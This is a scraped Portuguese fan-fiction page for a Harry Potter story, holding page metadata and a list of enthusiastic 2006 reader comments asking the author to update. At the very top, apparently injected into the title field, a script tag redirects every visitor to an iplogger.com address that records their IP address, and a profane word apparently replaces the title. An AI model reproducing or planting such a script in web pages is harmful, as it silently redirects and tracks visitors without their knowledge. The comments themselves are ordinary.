<SCRIPT>window.location.href="https://iplogger.com/1Opv3.gif"</SCRIPT »>
Foda-se
","headline":"","url":"https://www.floreioseborroes.net/fics/ver/5005","inLanguage":"pt-BR","genre":"Fan fiction","isAccessibleForFree":true,"description":"Essa fic contém spoilers, dicas, pistas, insinuações, palpites e mais sobre Harry Potter and the Half-Blood Prince. Os personagens e o enred","image":"http://storage.msn.com/x1pFUxp6NG29bW3Uy8xnoGhE3lfnFozsOj27OUjuAgYgzcUOsZ6EQx96JvNJhv6aleexlwABNPPtGP-h9pKtxxztqk09YsUIa25GQDUTXGp657FjIUVEwKu0Xleo521HD0yUElEHid32hDdS-q22xqjPg","datePublished":"2005-08-05","dateModified":"2017-04-25","author":{"@type":"Person","name":"Sônia Sag","url":"https://www.floreioseborroes.net/users/ver/3634"},"publisher":{"@type":"Organization","name":"Floreios e Borroes","url":"https://www.floreioseborroes.net"},"aggregateRating":{"@type":"AggregateRating","ratingValue":4.92,"ratingCount":21437,"bestRating":5,"worstRating":1}}
Foda-se
Comentários (2867)
Olá cara Amiga , naõ pense que eu te abandonei, não é este o caso, estou longe de casa....há muito tempo, mas não esqueci de você...Hoje achei uma lanhouse e adivinha qual foi a primeira coisa que fui ver???? E para minha surpresa encontrei dois capítulos, dei um grito e morri de vergonha na lan...mas tudo bem, vale qualquer coisa para ler sua fic....Um grande beijo no coração......
2006-05-03valeu muito boa a fc posta o new cap rapido
2006-05-03pelo amor de deus, atualiza logo , naum ageunto mais de ansiedade rsrs . ta muito loka a fic ,mas naum nos mate de curiosidade rs abraços rs
2006-05-02Nossa Sonia.... fazia dsd sexta q tinha visto a atualização;.... mas ainda naum tinha conseguido ler..... aiaiaiaiaiiaa agora estou mt anciosa...... atualize logoooo..... ~~~~~good vibes~~~~~~~~
2006-05-02Meu Merlim!!!A Bella morreeuu!!AEEEEEEEEE!!!!!!!!!!E a cicatriz dele tava sangrando, putz, devia ta doendo muito...tadinho..soniiaaa..perfeito o ca´, parabéns!!!e eu espero pelo proximo, por mais que demore uns 6 meses...nao..nao vamos exagerar né...um prazo de dois meses ta bom???hehehe...brincadeira!!!Atualiza qndo quiser!!mas não demore mto!!Bjooosss linda!!!Parabéns de novo
2006-05-01maravilhoso como sempre...rsrssrsrs =)
2006-05-01Sônia! Que bom saber que esta viva!!! e Desculpe a pressão, mais se trata de muitos Harry Potter Fans, desesperados por um dos mais importantes capítulos que uma fic do 7º livro possa ter... Desculpados? otimo! A gente te desculpa pela demorada atualização tambem.... O capitulo? Explendido! Eu confesso que não acreditei quando sai de uma das minha fics favoritas(qual eu tenho o numero decorado) e cliquei na 5005, sem esperanças, para ver se por um milagre o 33 estaria ali... e estava! Nossa, foi instantaneo, eu parecia uma criança de 3 anos cujo natal chegou mais cedo! Eu disse para mim mesma em tom de esforia "atualizado! 33! 33! 33!"... hahaha, sim, isso é sério... Agora uma pequena pergunta: eu devo perder as esperanças quanto a poder ler o 34 em um espaço curto de tempo??? Espero que não, se não eu cometo suicídio(brincaderinha...)...
2006-05-01quero lê o fim, tô bastante curioso para saber o final que vc reservou!!!!!!!!
2006-05-01Ae Sônia,,,Lembra de mim???OTIMO TEUS CAPS COMO TUA FIC PARABENS GAROTA DO TEU FA NUMERO 1 !!!!!!!!!!!!!!!
2006-05-01Mito bom, queria pedi pra vc, que no ultimo capitulo colocasse o que acontece com a vida de cada um dos personagens, tipo, o emprego que teve, se casou, teve filhos, seria bem legal, apenas uma sugestao. bjus!
2006-04-30